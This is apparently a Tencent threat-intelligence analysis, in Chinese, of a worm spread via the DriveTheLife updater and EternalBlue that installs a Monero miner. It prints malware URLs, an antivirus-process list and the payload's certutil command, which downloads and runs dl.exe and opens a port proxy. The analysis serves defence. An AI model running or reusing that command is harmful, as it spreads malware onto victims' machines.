騰訊安全御見威脅情報中心監測發現，一款通過「驅動人生」升級通道，並同時利用「永恆之藍」高危漏洞傳播的木馬突然爆發，僅2個小時受攻擊用戶就高達10萬。「驅動人生」木馬會利用高危漏洞在企業內網呈蠕蟲式傳播，並進一步下載雲控木馬，在中毒電腦進行門羅幣挖礦。

一、概述

12月14日下午，騰訊安全御見威脅情報中心監測發現，一款通過「驅動人生」升級通道，並同時利用「永恆之藍」高危漏洞傳播的木馬突然爆發，僅2個小時受攻擊用戶就高達10萬。

「驅動人生」木馬會利用高危漏洞在企業內網呈蠕蟲式傳播，並進一步下載雲控木馬，在中毒電腦上進行門羅幣挖礦。雲控木馬對企業信息安全威脅巨大，企業用戶須重點關注。

該病毒爆發剛好是周末時間，令企業網管猝不及防，周一工作日員工電腦開機後，建議立刻查殺病毒，再使用殺毒軟體的漏洞修復功能安裝系統補丁。個人電腦用戶使用騰訊電腦管家即可防禦。

本次病毒爆發有三個特點：

1.驅動人生升級通道傳播的病毒會在中毒電腦安裝雲控木馬；

2.病毒會利用永恆之藍漏洞在區域網內主動擴散；

3.通過雲端控制收集中毒電腦部分信息，接受雲端指令在中毒電腦進行門羅幣挖礦。

木馬攻擊流程圖

二、詳細分析

dtlupg.exe訪問以下url下載病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

（注意，為避免網友點擊以上鏈接可以直接下載病毒程序，對部分字元做了隱藏處理）

病毒文件釋放在：

C:Program Files (x86)DTLSoftriliUpdaterctrlf
f79cb9d2893b254cc75dfb7f3e454a69.exe等位置執行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 運行後最終釋放出 C:WINDOWSTempsvvhost.exe

（MD5：
2E9710A4B9CBA3CD11E977AF87570E3B）運行，svvhost.exe打包了「永恆之藍」等漏洞攻擊工具在內外網進一步擴散。

2.1 病毒母體

F79CB9D2893B254CC75DFB7F3E454A69.exe

運行後將自身拷貝到C:windowssystem32svhost.exe，安裝為服務並啟動，服務名為Ddiver，並在隨後拉起雲控模塊svhhost.exe、攻擊模塊svvhost.exe。

運行時先檢測互斥體，確定是否已感染過。

通過檢測以下進程將殺軟信息搜集準備上傳。

360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

檢測到任務管理器及遊戲進程則將雲控模塊svhhost.exe退出。

打開互斥體，對象名稱為”I am tHe xmr reporter” ，xmr意指xmrig.exe礦機。

搜集系統敏感信息上傳到hxxp://i.haqo.net/i.png,並接受返回的雲控代碼等待執行。

母體設置進程共享內存HSKALWOEDJSLALQEOD

2.2 挖礦

雲控木馬svhhost.exe其主要功能是，從母體進程svhost.exe共享內存中讀取shellcode解密並執行，每隔2000秒讀取一次共享內存中的shellcode進行解密執行，共享內存名為HSKALWOEDJSLALQEOD，目前該shellcode主要功能挖礦,不排除後期會拉取其他更加惡意如加密勒索等木馬病毒執行

雲控木馬執行流程

雲控木馬運行後會創建一個線程，該線程函數主要功能是判斷進程svhost.exe(母體進程)是否存在，不存在的話則啟動該進程，接下來要讀取的共享內存數據就是從該進程進行讀取

創建線程判斷母體進程是否存在

調用OpenFileMappingA打開共享內存，讀取共享內存數據

讀取共享內存數據

調用RtlDecompressBuffer函數解壓共享內存中的數據，為下一步執行做準備

解壓共享內存數據

共享內存數據加壓完後會執行，目前該shellcode主要功能挖礦,不排除後期會拉取其他更加惡意如加密勒索等木馬病毒執行

執行shellcode

嘗試挖礦時通信IP為172.105.204.237

2.3 攻擊模塊

攻擊模塊從地址
hxxp://dl.haqo.net/eb.exez下載，作為子進程Svvhost.Exe啟動，分析發現該文件是通過python實現的「永恆之藍」漏洞利用模塊壓縮打包程序。

子進程Svvhost.Exe為將python實現的「永恆之藍」漏洞利用模塊壓縮打包程序。

Mysmb.pyo為攻擊時掃描代碼。

GitHub上也可以看到相關開源代碼

掃描內網445埠進行攻擊

不僅攻擊內網漏洞機器，還隨機找幾個外網IP嘗試攻擊，1次攻擊完後沉默20分鐘

攻擊成功後paylaod在中招機器執行以下命令進行內網擴散傳播

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

安全建議

1. 伺服器暫時關閉不必要的埠（如135、139、445），方法可參考：
https://guanjia.qq.com/web_clinic/s8/585.html

2. 企業用戶在周一上班後，建議使用騰訊御點查殺病毒（個人用戶可使用騰訊電腦管家），然後使用漏洞修復功能，修復全網終端存在的系統高危漏洞；

3. 伺服器使用高強度密碼，切勿使用弱口令，防止黑客暴力破解；

4. 使用殺毒軟體攔截可能的病毒攻擊；

5. 推薦企業用戶部署騰訊御界高級威脅檢測系統防禦可能的黑客攻擊。御界高級威脅檢測系統，是基於騰訊反病毒實驗室的安全能力、依託騰訊在雲和端的海量數據，研發出的獨特威脅情報和惡意檢測模型系統。